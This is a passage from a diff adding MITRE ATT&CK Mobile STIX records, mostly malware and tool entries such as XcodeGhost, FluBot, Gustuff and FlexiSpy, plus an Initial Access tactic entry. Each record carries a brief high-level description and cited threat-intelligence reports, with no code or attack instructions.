(Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "created": "2017-10-25T14:48:46.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0308", + "external_id": "S0308" + }, + { + "source_name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XcodeGhost", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. 
(Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "created": "2017-10-25T14:48:42.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0297", + "external_id": "S0297" + }, + { + "source_name": "XcodeGhost", + "description": "(Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)" + }, + { + "source_name": "PaloAlto-XcodeGhost1", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/" + }, + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. 
Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SilkBean" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "type": "malware", + "created": "2020-12-24T21:41:36.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0549", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0549" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2021-04-19T14:29:45.809Z", + "name": "SilkBean", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "WolfRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "type": "malware", + "created": "2020-07-20T13:27:33.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0489", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0489" + }, + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-09-11T15:58:40.564Z", + "name": "WolfRAT", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. 
[WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-28T17:20:20.194Z", + "name": "BusyGasper", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. There have been less than 10 victims, all who appear to be located in Russia, that were all infected via physical access to the device.(Citation: SecureList BusyGasper)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "BusyGasper" + ], + "type": "malware", + "id": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "created": "2021-10-01T14:42:48.234Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0655", + "external_id": "S0655" + }, + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. 
Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "created": "2017-10-25T14:48:47.674Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0293", + "url": "https://attack.mitre.org/software/S0293" + }, + { + "source_name": "CheckPoint-BrainTest", + "url": "http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/", + "description": "Andrey Polkovnichenko and Alon Boxiner. (2015, September 21). BrainTest – A New Level of Sophistication in Mobile Malware. Retrieved December 21, 2016." + }, + { + "source_name": "Lookout-BrainTest", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. 
(Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)", + "modified": "2022-04-15T15:36:43.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "BrainTest", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "TERRACOTTA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "type": "malware", + "created": "2020-12-18T20:14:46.858Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0545", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0545" + }, + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-28T18:59:32.817Z", + "name": "TERRACOTTA", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Triada" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "type": "malware", + "created": "2019-07-16T14:33:12.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0424", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0424" + }, + { + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/", + "source_name": "Kaspersky Triada March 2016" + } + ], + "modified": "2020-05-28T16:52:37.979Z", + "name": "Triada", + "description": "[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. 
Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Golden Cup" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "type": "malware", + "created": "2020-11-20T15:44:57.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0535", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0535" + }, + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-22T21:48:10.951Z", + "name": "Golden Cup", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-31T23:02:48.577Z", + "name": "FluBot", + "description": "[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. 
It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "FluBot" + ], + "type": "malware", + "id": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "created": "2023-02-28T20:25:59.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1067", + "external_id": "S1067" + }, + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + }, + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRUȚĂ, Răzvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. 
Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViperRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "type": "malware", + "created": "2020-09-11T16:22:02.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0506", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0506" + }, + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-29T20:03:42.662Z", + "name": "ViperRAT", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Adups", + "description": "[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. 
The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "created": "2017-10-25T14:48:47.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0309", + "external_id": "S0309" + }, + { + "source_name": "Adups", + "description": "(Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)" + }, + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + }, + { + "source_name": "BankInfoSecurity-BackDoor", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. 
Retrieved February 6, 2017.", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SimBad" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "type": "malware", + "created": "2019-11-21T19:16:34.526Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0419", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0419" + }, + { + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/", + "source_name": "CheckPoint SimBad 2019" + } + ], + "modified": "2020-01-27T17:01:31.634Z", + "name": "SimBad", + "description": "[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name \"SimBad\" was derived from the fact that most of the infected applications were simulator games. 
The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Android/AdDisplay.Ashas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "type": "malware", + "created": "2020-10-29T19:19:08.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0525", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0525" + }, + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:19:08.848Z", + "name": "Android/AdDisplay.Ashas", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Marcher", + "description": "[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. 
(Citation: Proofpoint-Marcher)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0317", + "external_id": "S0317" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-29T21:11:14.364Z", + "name": "TianySpy", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. 
[TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122) ", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TianySpy" + ], + "type": "malware", + "id": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "created": "2023-01-19T18:05:30.924Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1056", + "external_id": "S1056" + }, + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DressCode", + "description": "[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. 
(Citation: TrendMicro-DressCode)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "created": "2017-10-25T14:48:37.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0300", + "external_id": "S0300" + }, + { + "source_name": "DressCode", + "description": "(Citation: TrendMicro-DressCode)" + }, + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Gustuff" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "type": "malware", + "created": "2019-09-03T20:08:00.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0406", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0406" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-10-14T19:14:17.007Z", + "name": "Gustuff", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_aliases": [ + "FlexiSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "type": "tool", + "created": "2019-09-04T15:38:56.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0408", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0408" + }, + { + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "source_name": "FortiGuard-FlexiSpy" + }, + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." + }, + { + "source_name": "FlexiSpy-Website", + "url": "https://www.flexispy.com/", + "description": "FlexiSpy. (n.d.). FlexiSpy. Retrieved September 4, 2019." + } + ], + "modified": "2019-10-14T18:08:28.349Z", + "name": "FlexiSpy", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. 
Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)\n\n[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Xbot", + "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)", + "labels": [ + "tool" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "tool", + "id": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "created": "2017-10-25T14:48:48.609Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0298", + "external_id": "S0298" + }, + { + "source_name": "Xbot", + "description": "(Citation: PaloAlto-Xbot)" + }, + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. 
Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0027", + "url": "https://attack.mitre.org/tactics/TA0027", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:02:36.744Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your device.\n\nThe initial access tactic represents the vectors adversaries use to gain an initial foothold onto a mobile device.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "initial-access" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + "type": "x-mitre-tactic", + "created": 